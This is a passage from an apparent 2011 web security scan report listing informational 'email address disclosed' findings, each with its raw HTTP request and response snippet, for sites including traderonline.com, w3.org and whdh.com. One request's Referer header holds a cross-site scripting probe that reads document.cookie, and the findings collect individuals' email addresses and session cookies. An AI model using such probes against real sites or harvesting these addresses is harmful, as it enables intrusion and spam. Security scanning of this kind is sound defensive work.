...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.438. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The following email address was disclosed in the response:
  • boston@thefeast.com

Request

GET /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.439. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The following email addresses were disclosed in the response:
  • Boston@thefeast.com
  • boston@thefeast.com

Request

GET /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<em>Boston@thefeast.com</em>
...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.440. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The following email address was disclosed in the response:
  • boston@thefeast.com

Request

GET /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<a class="rrBtnEmail" href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...
<a href="mailto:boston@thefeast.com?subject=Email Tip" alt="Email us Story Tips">
...[SNIP]...

24.441. http://www.thepointebrodiecreek.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thepointebrodiecreek.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • info@thepointebrodiecreek.com

Request

GET / HTTP/1.1
Host: www.thepointebrodiecreek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:38:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: aa12208afb9625fd94ad3303695798d2=04f33c6a4636df9808d42509edf25600; path=/
Last-Modified: Tue, 25 Jan 2011 04:38:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<span style="color: #0000ff;">info@thepointebrodiecreek.com</span>
...[SNIP]...

24.442. http://www.traderonline.com/advertise/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /advertise/

Issue detail

The following email addresses were disclosed in the response:
  • mcmillan@dominionenterprises.com
  • sam.leary@cycletrader.com

Request

GET /advertise/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TraderOnline.com Advertising</title>
   <meta name="description" content="Advertise with TraderOnline.com, Boat Tra
...[SNIP]...
<a href="mailto:mcmillan@dominionenterprises.com" title="Contact Sales">
...[SNIP]...
<a href="mailto:sam.leary@cycletrader.com" title="Contact Keysales">
...[SNIP]...

24.443. http://www.traderonline.com/javascript/master_s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /javascript/master_s_code.js

Issue detail

The following email addresses were disclosed in the response:
  • id@Ls.tc
  • kevin.rogers@dominionenterprises.com

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:32 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32369

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}


function tourWndw() {
    var imtTour=wind
...[SNIP]...
***
Includes for s_code condition from nav.templ
*********************************/
/***********************************************/
/*
SiteCatalyst code version: H.17.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
01.05.2009
*/
/***********************************************/

var s_account="detraderonline"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/*
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

24.444. http://www.traderonline.com/security/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /security/

Issue detail

The following email address was disclosed in the response:
  • fraud@traderonline.com

Request

GET /security/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:52 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 40567


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TraderOnline.com Safety &amp; Fraud Center - Protect Yourself from Online Fraud</title>
   <meta name="description"
...[SNIP]...
<a href="mailto:fraud@traderonline.com">fraud@traderonline.com</a>
...[SNIP]...
<a href="mailto:fraud@traderonline.com">fraud@traderonline.com</a>
...[SNIP]...

24.445. http://www.w-w-i.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • ronny.adsetts@amazinginternet.com

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:55 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Online Press Office</title>
<meta name="keywords" content="World Wi
...[SNIP]...
<![CDATA[
// AINet JavaScript
// Copyright 2008 Ronny Adsetts (ronny.adsetts@amazinginternet.com)
var div = bw.dom ? document.getElementById('bodytbl') : bw.ie4 ? document.all['bodytbl'] : 0;
if (div.scrollHeight >
...[SNIP]...

24.446. http://www.w-w-i.com/velux_5_oceans_2010_race

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race

Issue detail

The following email address was disclosed in the response:
  • webmaster@amazing-internet.net

Request

GET /velux_5_oceans_2010_race HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
Vary: accept-language,accept-charset,Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1104

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:webmaster@amazing-internet.net" />
...[SNIP]...
<a href="mailto:webmaster@amazing-internet.net">
...[SNIP]...

24.447. http://www.w-w-i.com/velux_5_oceans_2010_race/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The following email address was disclosed in the response:
  • ronny.adsetts@amazinginternet.com

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...
<![CDATA[
// AINet JavaScript
// Copyright 2008 Ronny Adsetts (ronny.adsetts@amazinginternet.com)
var div = bw.dom ? document.getElementById('bodytbl') : bw.ie4 ? document.all['bodytbl'] : 0;
if (div.scrollHeight >
...[SNIP]...

24.448. http://www.w3.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • site-comments@w3.org

Request

GET / HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:40:14 GMT
Server: Apache/2
Content-Location: Home.html
Vary: negotiate,accept,Accept-Encoding
TCN: choice
Last-Modified: Mon, 24 Jan 2011 03:48:27 GMT
ETag: "7206-49a8f78f278c0;89-3f26bd17a2f00"
Accept-Ranges: bytes
Content-Length: 29190
Cache-Control: max-age=600
Expires: Tue, 25 Jan 2011 04:50:14 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- Generated from da
...[SNIP]...
<a href="mailto:site-comments@w3.org">
...[SNIP]...

24.449. http://www.w3.org/TR/css3-selectors/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/css3-selectors/

Issue detail

The following email addresses were disclosed in the response:
  • ian@hixie.ch
  • www-style@w3.org

Request

GET /TR/css3-selectors/ HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:07 GMT
Server: Apache/2
Last-Modified: Mon, 14 Dec 2009 23:41:18 GMT
ETag: "1fda8-47ab8cf570380"
Accept-Ranges: bytes
Content-Length: 130472
Cache-Control: max-age=21600
Expires: Mon, 24 Jan 2011 21:15:07 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang=en>
<head>
<title>Selectors Level 3</title>
<link href=default.css rel=stylesheet type="text
...[SNIP]...
<a class="url fn" href="mailto:ian@hixie.ch">
...[SNIP]...
<a
href="mailto:www-style@w3.org?Subject=%5Bcss3-selectors%5D%20PUT%20SUBJECT%20HERE">www-style@w3.org</a>
...[SNIP]...

24.450. http://www.w3.org/TR/html4/strict.dtd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/html4/strict.dtd

Issue detail

The following email addresses were disclosed in the response:
  • dsr@w3.org
  • ij@w3.org
  • lehors@w3.org

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:19 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 00:11:19 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

24.451. http://www.x64bitdownload.com/js/rating.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /js/rating.js

Issue detail

The following email address was disclosed in the response:
  • ryan@masugadesign.com

Request

GET /js/rating.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:40 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 29 Oct 2010 10:56:13 GMT
ETag: "14e3ae8-2c36-493bf4e90ed40"
Accept-Ranges: bytes
Content-Length: 11318
Connection: close
Content-Type: application/x-javascript

/*
Behaviour v1.1 by Ben Nolan, June 2005. Based largely on the work
of Simon Willison (see comments by Simon below).

Description:

   Uses css selectors to apply javascript behaviours to e
...[SNIP]...
rating.js
Created: Aug 2006
Last Mod: Mar 11 2007
Handles actions and requests for rating bars.
---------------------------------------------------------
ryan masuga, masugadesign.com
ryan@masugadesign.com
Licensed under a Creative Commons Attribution 3.0 License.
http://creativecommons.org/licenses/by/3.0/
See readme.txt for full credit details.
---------------------------------------------------------
...[SNIP]...

24.452. http://www.x64bitdownload.com/templates/X64/css/rating.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /templates/X64/css/rating.css

Issue detail

The following email address was disclosed in the response:
  • ryan@masugadesign.com

Request

GET /templates/X64/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:40 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 26 Jun 2009 10:56:03 GMT
ETag: "14e3ae9-881-46d3e2fba96c0"
Accept-Ranges: bytes
Content-Length: 2177
Connection: close
Content-Type: text/css

/* styles for the unit rater
---------------------------------------------------------
ryan masuga, masugadesign.com
ryan@masugadesign.com
Licensed under a Creative Commons Attribution 3.0 License.
http://creativecommons.org/licenses/by/3.0/
See readme.txt for full credit details.
---------------------------------------------------------
...[SNIP]...

24.453. http://www1.whdh.com/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /contact/

Issue detail

The following email addresses were disclosed in the response:
  • cyber@whdh.com
  • helpmehank@whdh.com
  • newstips@whdh.com
  • program_feedback@whdh.com
  • station_management@whdh.com
  • viewer_news@whdh.com
  • webmaster@whdh.com

Request

GET /contact/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:02 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 118
Cache-Control: max-age=16035
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:22:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 10214
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Contact Us</title>
<meta name="publisher" content="New England N
...[SNIP]...
<a href="mailto:webmaster@whdh.com">webmaster@whdh.com</a>
...[SNIP]...
<a href="mailto:cyber@whdh.com">cyber@whdh.com</a>
...[SNIP]...
<a href="mailto:helpmehank@whdh.com">helpmehank@whdh.com</a>
...[SNIP]...
<a href="mailto:newstips@whdh.com">newstips@whdh.com</a>
...[SNIP]...
<a href="mailto:viewer_news@whdh.com">viewer_news@whdh.com</a>
...[SNIP]...
<a href="mailto:program_feedback@whdh.com">program_feedback@whdh.com</a>
...[SNIP]...
<a href="mailto:station_management@whdh.com">station_management@whdh.com</a>
...[SNIP]...

24.454. http://www1.whdh.com/contact/closed-caption-concerns

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /contact/closed-caption-concerns

Issue detail

The following email addresses were disclosed in the response:
  • ClosedCaptionConcerns@whdh.com
  • jshultis@whdh.com

Request

GET /contact/closed-caption-concerns HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:13 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: closed-caption-concerns.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 9050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Closed Caption Concerns</title>
<meta name="publisher" content="
...[SNIP]...
<a href=\"mailto:ClosedCaptionConcerns@whdh.com\">ClosedCaptionConcerns@whdh.com</a>
...[SNIP]...
<br/>" +
"EMAIL: jshultis@whdh.com" +
"</p>
...[SNIP]...

24.455. http://www1.whdh.com/events/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /events/

Issue detail

The following email address was disclosed in the response:
  • kmeidanis@whdh.com

Request

GET /events/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43028
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:54:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13847
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Community Calendar</title>
<meta name="publisher" content="New E
...[SNIP]...
<a href="mailto:kmeidanis@whdh.com">kmeidanis@whdh.com</a>
...[SNIP]...

24.456. http://www1.whdh.com/features/articles/dish/BO144734/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144734/

Issue detail

The following email address was disclosed in the response:
  • JParrish@whdh.com

Request

GET /features/articles/dish/BO144734/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
